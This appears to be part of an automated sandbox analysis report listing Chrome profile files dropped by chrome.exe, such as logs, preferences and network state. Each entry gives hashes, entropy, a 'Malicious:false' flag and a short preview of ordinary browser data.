                                                                                                                                                                                SSDEEP:6:maaOutwQWM+q2PWXp+N23iKKdK8a2jMGIFUtnaOXvG1ZmwBaO9cSQWMVkwOWXp+3:pafN+va5Kk8EFUtna+e1/BaVV5f5Kk8N
                                                                                                                                                                                MD5:0493911DE7A5ABF806F99C7FAE4F8802
                                                                                                                                                                                SHA1:0DABEF98C8F5961ACE7394AC813C7A1B0EB0173E
                                                                                                                                                                                SHA-256:C485911C924F98EE1F5B2CEEE93D7D12854F90240D1F132393305EAA2F9975EA
                                                                                                                                                                                SHA-512:AF53A379683BBF3C02C8FFD1C050B1E9F4FD4DD2EA008877F252B0FE44B8700B2C13D3E94E529D5BC51661751C8293B1E6D8776D0ADAD1E854C78402C5D8D25F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.785 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:17:18.790 91c Recovering log #3.2021/10/25-18:17:18.792 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):329
                                                                                                                                                                                Entropy (8bit):5.198308983975779
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaOutwQWM+q2PWXp+N23iKKdK8a2jMGIFUtnaOXvG1ZmwBaO9cSQWMVkwOWXp+3:pafN+va5Kk8EFUtna+e1/BaVV5f5Kk8N
                                                                                                                                                                                MD5:0493911DE7A5ABF806F99C7FAE4F8802
                                                                                                                                                                                SHA1:0DABEF98C8F5961ACE7394AC813C7A1B0EB0173E
                                                                                                                                                                                SHA-256:C485911C924F98EE1F5B2CEEE93D7D12854F90240D1F132393305EAA2F9975EA
                                                                                                                                                                                SHA-512:AF53A379683BBF3C02C8FFD1C050B1E9F4FD4DD2EA008877F252B0FE44B8700B2C13D3E94E529D5BC51661751C8293B1E6D8776D0ADAD1E854C78402C5D8D25F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.785 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/10/25-18:17:18.790 91c Recovering log #3.2021/10/25-18:17:18.792 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State2T (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2642
                                                                                                                                                                                Entropy (8bit):4.931732465818912
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:Y2TntwXGDH3qz5sAGs2RLsBCrq9sMRscO7sk5saMHkYdseMHIMHKUDYhbD:JTnOXGDHaz/IJr4nO1pGVGIGKjhH
                                                                                                                                                                                MD5:4D2806DA3AA743750E56DA11560ADE1F
                                                                                                                                                                                SHA1:D0CEC495EF3EE8981234CF43EE94B42E441632E5
                                                                                                                                                                                SHA-256:485661F34B6AA865CC4CB4794F2ACAFF6072402172FE2C97E6399972D8B4D1EB
                                                                                                                                                                                SHA-512:F532BFDF6C660E4F4D4987AF8E1362BFD6A6D8D4C0717FBBB50621C890DDF8561096416DD4D8B732628A66F34D25B96A95B58862D36B98276E05227BBE99AE4B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282276641673104","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282276641679333","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{"al
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent StateMP (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4219
                                                                                                                                                                                Entropy (8bit):4.871684703914691
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                                                MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                                                SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                                                SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                                                SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                Entropy (8bit):5.2872312735195734
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaQF5QVq2PWXp+N23iKKdKgXz4rRIFUtnaQJgZmwBaQx0IkwOWXp+N23iKKdKgi:paQFqva5KkgXiuFUtnaQG/BaQxP5f5K2
                                                                                                                                                                                MD5:C89D539FA3FA9B816C420811EB4FA07E
                                                                                                                                                                                SHA1:F32B282BED2CB0E84A730FCCD985A7623B4F2089
                                                                                                                                                                                SHA-256:DA36D82F99B4818D53CC69420AC4E037078B69D06DC32C1965286B39768D9467
                                                                                                                                                                                SHA-512:D83F94C0F755B13FBA1EEACBE726F0790BF105EEFC33E6BFDA204E9FA8F6BCF236486534BA93422911321CF7FCFC2A6DD1A18E66E39A3BC55CD5515F8934ADB6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.719 f64 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/10/25-18:17:19.723 f64 Recovering log #3.2021/10/25-18:17:19.726 f64 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.oldMP (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                Entropy (8bit):5.2872312735195734
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaQF5QVq2PWXp+N23iKKdKgXz4rRIFUtnaQJgZmwBaQx0IkwOWXp+N23iKKdKgi:paQFqva5KkgXiuFUtnaQG/BaQxP5f5K2
                                                                                                                                                                                MD5:C89D539FA3FA9B816C420811EB4FA07E
                                                                                                                                                                                SHA1:F32B282BED2CB0E84A730FCCD985A7623B4F2089
                                                                                                                                                                                SHA-256:DA36D82F99B4818D53CC69420AC4E037078B69D06DC32C1965286B39768D9467
                                                                                                                                                                                SHA-512:D83F94C0F755B13FBA1EEACBE726F0790BF105EEFC33E6BFDA204E9FA8F6BCF236486534BA93422911321CF7FCFC2A6DD1A18E66E39A3BC55CD5515F8934ADB6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.719 f64 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/10/25-18:17:19.723 f64 Recovering log #3.2021/10/25-18:17:19.726 f64 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5869
                                                                                                                                                                                Entropy (8bit):5.195307938892697
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:nY8Cl3e995q8ct8cKILok0JCKL8QkA1UbOTQVuwn:njC095B28ck4KrkAE
                                                                                                                                                                                MD5:C0098EAF7CFDCB8CD45A3F1386EFA362
                                                                                                                                                                                SHA1:0406B45E85DEA86FDE0307D8E430F6D62148ED07
                                                                                                                                                                                SHA-256:D4E97EF666C59BC3B6792E6ECD74FA932A7F6EFE013EB11E46EF37BDDCF80C1A
                                                                                                                                                                                SHA-512:383B2A3E1DB84807757045EF5EC4776FF366B70BCB8A7366BFD837E6B355A2BB9397A7041331EA26B98A597A03901EA01B8CE3933AD60A9EBDB75E0F8FB0C14C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13279684639611036","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                Entropy (8bit):1.172569965439993
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:wIElwQF8mpcSaszf0rsbKfxq4bE3rjZhD:wIElwQF8mpcSaszcLJaJp
                                                                                                                                                                                MD5:81435BBDF3243DDC7E5C827E2F6C8EFB
                                                                                                                                                                                SHA1:CF152516C1F0249AABB1CD8472451A3F34E12E79
                                                                                                                                                                                SHA-256:DA4C9A10414F0FE65F5C4BF04B55EC13581E3AE093BD3514C73B2C6489C1448F
                                                                                                                                                                                SHA-512:198F1B4A0B975D7263C3DC1167A26FB7C703E8B28E82228664DF1EB4D00AF8709CE1F8AB18832690A8D8FD895D1F89AC3E7087BAED19DD9EE058D572210C9F6A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15628
                                                                                                                                                                                Entropy (8bit):5.292871661441512
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
                                                                                                                                                                                MD5:F60AB4E9A79FD6F32909AFAC226446B3
                                                                                                                                                                                SHA1:07C9E383D4488BEBE316CA86966FC728F55A2E32
                                                                                                                                                                                SHA-256:CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
                                                                                                                                                                                SHA-512:F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.. (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):22596
                                                                                                                                                                                Entropy (8bit):5.535885803495995
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vgjtpLl3UXR1kXqKf/pUZNCgVLH2HfD6rUAHG+nTxwI45:CLl2R1kXqKf/pUZNCgVLH2Hf+rUEG+nu
                                                                                                                                                                                MD5:D2545EED6609D08E1A85A99D12B9AAFA
                                                                                                                                                                                SHA1:B4F36404480024CF4B23067EEF9ADB6DBA09DDF7
                                                                                                                                                                                SHA-256:8A14A08F689FBC3D57FC69CC520E8DC2A9D9831F34C1D87856959A7117289AFB
                                                                                                                                                                                SHA-512:E64E1BFBE869A9B4E6A76D533461559C86362AA8BF8F2F890F857402C63FA98D8CEE5E3AF46F208EF56BAABE5F87D707E6D3E4E6FB385C08396EADFAE50D76EB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13279684638762118","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                Entropy (8bit):2.5144888658965625
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:S85aEFljljljljljljljljljljljljljljljl:S+a8ljljljljljljljljljljljljljl3
                                                                                                                                                                                MD5:99EB4F3410780D4F7C9F432F5CC23F74
                                                                                                                                                                                SHA1:186C87877609C9F2B5F44BBC3F9EECE2E096F842
                                                                                                                                                                                SHA-256:F6644A9BB1515338C075E4566E5A4862E68CEC526012120AB1269A36C1F2855A
                                                                                                                                                                                SHA-512:986ED64FA359668606A5E6B7528D9244CD0093097A8F8B701A8108DE20D7F7CB09BEFCBB5653CFE1A0C32813020B5646A278CAB9E4D5DE2F2E40DD2492037C3F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):320
                                                                                                                                                                                Entropy (8bit):5.207341088338254
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaSnq2PWXp+N23iKKdKrQMxIFUtnaSARXZmwBaSARFkwOWXp+N23iKKdKrQMFLJ:paQva5KkCFUtnavX/BavF5f5KktJ
                                                                                                                                                                                MD5:7445DEC59038FC31DC956CAFEFDD982C
                                                                                                                                                                                SHA1:4C222E847CB87C89BDF835EC764C56E219356263
                                                                                                                                                                                SHA-256:B42D192501F3B698A851C8906E979A13B477FFE71B1493016981421960D6FDBA
                                                                                                                                                                                SHA-512:C01AFF6BE4F00886BCB3FBF769CAE2951E870E884E1529E30E54AC024EE7C1FCC65BB6F97EADAF053EC61BD785C4769213EC53256FBB5B9182DFB83C21CC1BD7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.593 13a4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/10/25-18:17:19.595 13a4 Recovering log #3.2021/10/25-18:17:19.595 13a4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):320
                                                                                                                                                                                Entropy (8bit):5.207341088338254
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaSnq2PWXp+N23iKKdKrQMxIFUtnaSARXZmwBaSARFkwOWXp+N23iKKdKrQMFLJ:paQva5KkCFUtnavX/BavF5f5KktJ
                                                                                                                                                                                MD5:7445DEC59038FC31DC956CAFEFDD982C
                                                                                                                                                                                SHA1:4C222E847CB87C89BDF835EC764C56E219356263
                                                                                                                                                                                SHA-256:B42D192501F3B698A851C8906E979A13B477FFE71B1493016981421960D6FDBA
                                                                                                                                                                                SHA-512:C01AFF6BE4F00886BCB3FBF769CAE2951E870E884E1529E30E54AC024EE7C1FCC65BB6F97EADAF053EC61BD785C4769213EC53256FBB5B9182DFB83C21CC1BD7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.593 13a4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/10/25-18:17:19.595 13a4 Recovering log #3.2021/10/25-18:17:19.595 13a4 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                Entropy (8bit):5.205179729478129
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaOmR1N+q2PWXp+N23iKKdK7Uh2ghZIFUtnaOXQZZmwBaO9QNVkwOWXp+N23iKm:paf+va5KkIhHh2FUtna+QZ/Ba9NV5f5m
                                                                                                                                                                                MD5:2A36D2BAC8C46CB23A82173390E5099B
                                                                                                                                                                                SHA1:84598BB286DD7AA5ED094D1ED79041C2A4E6D819
                                                                                                                                                                                SHA-256:E4BA2A65B6478F01839B5E7ACFB1A1475502C7A4B7D6C1CB4CEA07B00EB38B6A
                                                                                                                                                                                SHA-512:4EC58514B63E83170B5D6235E7CD1205F1C5EF7A31D5B5CC0F06486DAA8C54458CAF854574DE30157E51D443C43F926ECF6D631AAA6F259E771BE814B3832CEF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.785 149c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/10/25-18:17:18.790 149c Recovering log #3.2021/10/25-18:17:18.792 149c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                Entropy (8bit):5.205179729478129
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaOmR1N+q2PWXp+N23iKKdK7Uh2ghZIFUtnaOXQZZmwBaO9QNVkwOWXp+N23iKm:paf+va5KkIhHh2FUtna+QZ/Ba9NV5f5m
                                                                                                                                                                                MD5:2A36D2BAC8C46CB23A82173390E5099B
                                                                                                                                                                                SHA1:84598BB286DD7AA5ED094D1ED79041C2A4E6D819
                                                                                                                                                                                SHA-256:E4BA2A65B6478F01839B5E7ACFB1A1475502C7A4B7D6C1CB4CEA07B00EB38B6A
                                                                                                                                                                                SHA-512:4EC58514B63E83170B5D6235E7CD1205F1C5EF7A31D5B5CC0F06486DAA8C54458CAF854574DE30157E51D443C43F926ECF6D631AAA6F259E771BE814B3832CEF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:18.785 149c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/10/25-18:17:18.790 149c Recovering log #3.2021/10/25-18:17:18.792 149c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\90ffbf66-70a1-431f-ab38-4e0141a0e529.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):420
                                                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                                                SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):427
                                                                                                                                                                                Entropy (8bit):5.271732460508218
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaSWSQWM+q2PWXp+N23iKKdKusNpV/2jMGIFUtnaSwwG1ZmwBaSaQWMVkwOWXpM:paH3+va5KkFFUtnaTz1/Ba6V5f5KkOJ
                                                                                                                                                                                MD5:E53E7DA48D3CE612D95A464CB39FB246
                                                                                                                                                                                SHA1:B4D602DEF0DC0CD28DC374801973E5AA685E9B5C
                                                                                                                                                                                SHA-256:BF6448CE3781E73DF769E8E96AB33F9346B9D906EB64A41F81908F597C17D399
                                                                                                                                                                                SHA-512:BF2FCE9209B134BD3A95F94BC1681B94203B68B940CA3C28867B401D6134E483543BB78F5B8A784F4BE23AAD5F893C0378BCF01161C228DC7AB0031862A659B1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
